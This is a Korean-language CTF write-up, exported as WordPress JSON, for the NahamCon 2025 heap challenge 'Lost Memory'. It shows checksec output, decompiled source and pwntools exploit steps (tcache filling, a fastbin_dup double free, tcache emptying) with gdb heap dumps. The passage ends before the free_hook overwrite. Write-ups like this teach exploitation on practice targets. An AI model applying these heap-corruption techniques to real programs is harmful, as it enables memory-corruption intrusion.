{"id":3683,"date":"2025-05-27T22:32:55","date_gmt":"2025-05-27T13:32:55","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3683"},"modified":"2025-05-27T22:32:56","modified_gmt":"2025-05-27T13:32:56","slug":"nahamcon-2025-ctf-lost-memory-fastbin_dup-free_hook","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3683","title":{"rendered":"[NahamCon 2025 CTF] Lost Memory (fastbin_dup, free_hook)"},"content":{"rendered":"\n

checksec<\/h3>\n\n\n\n
ubuntu@a4852d66fed7:~\/study\/naham2025\/lost_memory$ checksec .\/lost_memory \n[*] '\/home\/ubuntu\/study\/naham2025\/lost_memory\/lost_memory'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No<\/pre>\n\n\n\n
libc.so.6 version<\/h3>\n\n\n\n
Ubuntu GLIBC 2.31-0ubuntu9.17<\/strong><\/p>\n\n\n\n
ubuntu@a4852d66fed7:~\/study\/naham2025\/lost_memory$ .\/libc.so.6\nGNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.17) stable release version 2.31.\nCopyright (C) 2020 Free Software Foundation, Inc.\nThis is free software; see the source for copying conditions.\nThere is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE.\nCompiled by GNU CC version 9.4.0.\nlibc ABIs: UNIQUE IFUNC ABSOLUTE\nFor bug reporting instructions, please see:\n<https:\/\/bugs.launchpad.net\/ubuntu\/+source\/glibc\/+bugs>.<\/pre>\n\n\n\n
Decompiled-src \/ Analysis<\/h3>\n\n\n\n
menu \ud568\uc218\ub97c \ubcf4\uba74 \uc54c\ub2e4\uc2dc\ud53c 5\uac00\uc9c0 \uc874\uc7ac\ud55c\ub2e4.<\/p>\n\n\n\n
\uc778\ub371\uc2a4\ub97c \uc9c0\uc815\ud558\uc5ec \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uac70\ub098 \ud574\uc81c, \ub370\uc774\ud130\ub97c \uc4f8 \uc218 \uc788\uc73c\uba70
\uc2a4\ud0dd \uac12\uc744 \uc720\ucd9c\uc2dc\ud0ac \uc218 \uc788\ub294 5\ubc88 \uba54\ub274\uac00 \uc874\uc7ac\ud55c\ub2e4.<\/p>\n\n\n\n
void *setup_globals()\n{\n  void *result; \/\/ rax\n  int i; \/\/ [rsp+Ch] [rbp-4h]\n\n  memset(&input, 0, 0x100u);\n  for ( i = 0; i <= 9; ++i )\n  {\n    if ( *(&ptr + i) )\n      *(&ptr + i) = 0;\n    if ( newPtr[i] )\n      newPtr[i] = 0;\n  }\n  memIndex = 0;\n  result = memset(ptrSize, 0, sizeof(ptrSize));\n  choice = 0;\n  size = 0;\n  return result;\n}\n\nint menu()\n{\n  puts(\"1. Allocate Memory\");\n  puts(\"2. Write to Memory\");\n  puts(\"3. Select Index\");\n  puts(\"4. Free Memory\");\n  puts(\"5. Store Flag Return Value\");\n  puts(\"6. Exit\");\n  return puts(\"Enter your choice:\");\n}\n\nint vuln()\n{\n  __int64 v1; \/\/ rbx\n  _QWORD v2[3]; \/\/ [rsp+8h] [rbp-18h] BYREF\n\n  v2[0] = 0xDEADBEEFDEADBEEFLL;\n  setup_globals();\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        while ( 1 )\n        {\n          while ( 1 )\n          {\n            choice = 0;\n            menu();\n            fflush(stdin);\n            fgets(&input, 256, stdin);\n            choice = atoi(&input);\n            memset(&input, 0, 0x100u);\n            size = 0;\n            if ( choice != 1 )\n              break;\n            puts(\"What size would you like?\");\n            fgets(&input, 256, stdin);\n            size = atol(&input);\n            memset(&input, 0, 0x100u);\n            if ( size > 0x100 )\n              return puts(\"Size too large\");\n            v1 = memIndex;\n            *(&ptr + v1) = malloc(size);\n            ptrSize[memIndex] = size;\n            puts(\"Allocated memory\");\n          }\n          if ( choice != 2 )\n            break;\n          puts(\"What would you like to write?\");\n          fflush(stdin);\n          fgets(&input, 256, stdin);\n          if ( !input )\n            return puts(\"No input provided\");\n          puts(\"Writing to memory...\");\n          memcpy(*(&ptr + memIndex), &input, ptrSize[memIndex]);\n          printf(\"ptr[memIndex] = %s\\n\", (const char *)*(&ptr + memIndex));\n          printf(\"input = %s\\n\", &input);\n          memset(&input, 0, 0x100u);\n        }\n        if ( choice != 3 )\n          break;\n        printf(\"Select an index to write to (0 - %d)\\n \", 9);\n        fgets(&input, 256, stdin);\n        memIndex = atol(&input);\n        memset(&input, 0, 0x100u);\n        if ( (unsigned __int64)memIndex > 9 )\n          return puts(\"Invalid index\");\n      }\n      if ( choice != 4 )\n        break;\n      if ( *(&ptr + memIndex) )\n      {\n        puts(\"Freeing memory...\");\n        free(*(&ptr + memIndex));\n      }\n      else\n      {\n        puts(\"No memory to free\");\n      }\n    }\n    if ( choice != 5 )\n      break;\n    puts(\"Storing flag return value\");\n    *(_QWORD *)*(&ptr + memIndex) = v2;\n    printf(\"Stored return value: %p\\n\", *(const void **)*(&ptr + memIndex));\n    printf(\"Stored return value: %p\\n\", v2);\n  }\n  if ( choice == 6 )\n    return puts(\"Exiting...\");\n  else\n    return puts(\"Invalid choice\");\n}<\/pre>\n\n\n\n
Solution<\/h3>\n\n\n\n
1. tcache \uac00\ub4dd \ucc44\uc6b0\uae30 \/ \uc2a4\ud0dd\uc8fc\uc18c \ub204\ucd9c\ud558\uae30<\/h3>\n\n\n\n
\uba3c\uc800 \uc778\ub371\uc2a4 0\uc744 \uc9c0\uc815\ud574 \ud560\ub2f9\ud574\uc900\ub2e4\uc74c, \uc2a4\ud0dd\uc8fc\uc18c\ub97c \ub204\ucd9c\uc2dc\ud0a8\ub2e4. 
\uadf8\ub7f0 \ub2e4\uc74c 6\ubc88 \ub354 \ud560\ub2f9\ud788\uc57c \ucd94\ud6c4 tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 \uc900\ube44\uc791\uc5c5\uc744 \ud55c\ub2e4.<\/p>\n\n\n\n
\uc774\ud6c4 3\ubc88 \ub354 \ud560\ub2f9\uc2dc\ucf1c \ucd94\ud6c4 fastbin\uc5d0 \ub123\uc744 \uc900\ube44\ub97c \ud55c\ub2e4.<\/p>\n\n\n\n
fastbin\uc5d0 \uc18d\ud558\uae30 \uc704\ud574 malloc\ud06c\uae30\ub294 0x20\uc73c\ub85c \uc9c0\uc815\ud574\uc8fc\uc5c8\uace0, 
\uc774\uc81c tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 \ucc98\uc74c \ud560\ub2f9\ud588\ub358 \uc778\ub371\uc2a4\ubd80\ud130 \uc2dc\uc791\ud558\uc5ec \ud560\ub2f9\ud574\uc81c\ub97c \uc2dc\ucf1c\uc900\ub2e4.<\/p>\n\n\n\n
select_index(0)\nalloc(0x20)\nwrite_mem(b\"AAAA\")\n\na, b = leak_mem()\ninfo(f\"leak a:{a}, b:{b}\")\n\nfor i in range(1, 7):\n    select_index(i)\n    alloc(0x20)\n\nfor i in range(7, 10):\n    select_index(i)\n    alloc(0x20)\n\nfor i in range(0, 7):\n    select_index(i)\n    free_mem()<\/pre>\n\n\n\n
    \n
  • Result<\/li>\n<\/ul>\n\n\n\n
    \ubcf4\ub2e4\uc2dc\ud53c tcache\uc5d0 7\ubc88 \uac00\ub4dd\ucc44\uc6cc\uc9c4 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
    ubuntu@a4852d66fed7:~\/study\/naham2025\/lost_memory$ python3 solve2.py\n[+] Starting local process '.\/lost_memory': pid 1107\n[*] leak a:b'0x7fffffffe4a8', b:b'0x7fffffffe4a8'\n\ngdb -p 1107\n...\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x405470 (size : 0x20b90) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x30)   tcache_entry[1](7): 0x4053c0 --> 0x405390 --> 0x405360 --> 0x405330 --> 0x405300 --> 0x4052d0 --> 0x4052a0\ngdb-peda$ <\/pre>\n\n\n\n
    \uc774\ud6c4\ubd80\ud130 \uc778\ub371\uc2a4 7\uc744 \uc120\ud0dd\ud574 free\uc2dc\ud0a4\uba74, \uadf8\ub54c\ubd80\ud130\ub294 fastbin\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
      \n
    • \uacb0\uacfc<\/li>\n<\/ul>\n\n\n\n
      gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x4053e0 --> 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x405470 (size : 0x20b90) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x30)   tcache_entry[1](7): 0x4053c0 --> 0x405390 --> 0x405360 --> 0x405330 --> 0x405300 --> 0x4052d0 --> 0x4052a0<\/pre>\n\n\n\n
      2. fastbin_dup \ubc84\uadf8 \ud2b8\ub9ac\uac70<\/h3>\n\n\n\n
      tcache\uc5d0 7\ubc88 \uac00\ub4dd\ucc44\uc6b0\uba74, \uadf8 \uc774\ud6c4\ubd80\ud130\ub294 fastbin\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
      free list\uc758 top\uc5d0 \ud574\ub2f9\ub418\uc9c0\ub9cc \uc54a\uc73c\uba74, double-free\ub97c \ud2b8\ub9ac\uac70\uc2dc\ud0ac \uc218 \uc788\uae30\uc5d0
      \uc21c\uc11c\ub300\ub85c 7, 8, 7 \uc778\ub371\uc2a4\uc5d0 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\uc2dc\ucf1c\uc900\ub2e4.<\/p>\n\n\n\n
      # Trigger fastbin_dup\nselect_index(7)\nfree_mem()\nselect_index(8)\nfree_mem()\nselect_index(7)\nfree_mem()<\/pre>\n\n\n\n
        \n
      • \uacb0\uacfc<\/li>\n<\/ul>\n\n\n\n
        \uc774\uc81c tcache \ub9ac\uc2a4\ud2b8\uc758 \uba54\ubaa8\ub9ac \ud560\ub2f9\uc744 \uc804\ubd80 \ub2e4\ud558\uace0 \ub098\uba74(=\uc804\ubd80 \ube44\uc6b0\uac8c \ub418\uba74), 
        \uadf8 \uc774\ud6c4 fastbin \ub9ac\uc2a4\ud2b8\ub97c \ubcf4\ub2e4\uc2dc\ud53c 1\ubc88\uc9f8\uc640 3\ubc88\uc9f8\uc758 \ud560\ub2f9\ubc1b\ub294 \uc8fc\uc18c\uac00 \uc11c\ub85c \uac19\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
        gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x4053e0 --> 0x405410 --> 0x4053e0 (overlap chunk with 0x4053e0(freed) )\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x405470 (size : 0x20b90) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x30)   tcache_entry[1](7): 0x4053c0 --> 0x405390 --> 0x405360 --> 0x405330 --> 0x405300 --> 0x4052d0 --> 0x4052a0\ngdb-peda$ <\/pre>\n\n\n\n
        3. tache \ub9ac\uc2a4\ud2b8 \ube44\uc6b0\uae30<\/h3>\n\n\n\n
        tcache \ub9ac\uc2a4\ud2b8\uc5d0 \ucc44\uc6cc\uc9c4 \uac83\ub4e4\uc744 \ube44\uc6b0\uae30 \uc704\ud574 
        \uac19\uc740 \ud06c\uae30\ub85c 7\ubc88 \ub2e4\uc2dc \ud560\ub2f9\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n
        #empty tcache\nfor i in range(0, 7):\n    select_index(i)\n    alloc(0x20)<\/pre>\n\n\n\n